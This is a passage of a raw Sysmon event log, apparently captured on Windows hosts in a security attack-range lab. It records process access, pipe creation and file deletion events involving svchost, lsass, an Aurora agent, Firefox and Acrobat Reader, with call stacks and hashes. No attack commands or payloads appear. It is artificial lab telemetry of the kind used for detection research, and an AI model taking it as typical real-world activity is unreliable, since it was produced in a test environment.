Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000047890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:36.593{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.0.157724195C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000047889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:36.593{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000047888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.546{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d41c2|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.546{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000047886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.468{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\parent.lockMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.364{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65C-63C7-9106-00000000AF02}5072C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.360{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E65B-63C7-9006-00000000AF02}5136C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.357{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8D06-00000000AF02}6128C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.354{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.352{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.349{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000047879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.204{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8921208C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000047878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.189{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7200A46431BE89DE215BE5C4E1E282C,SHA256=EE107A6674256DA5658907424076F640E2750E44124E5DB2D11968B5989F5827,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018894Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:37.749{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C40511BB51D0495B7E156EC06AA656F9,SHA256=46CBEB5C4FF41BE7AA8118B12D06B8ABC37984B2C72856A06D01DAF108602976,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.999{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.998{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:37.991{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program 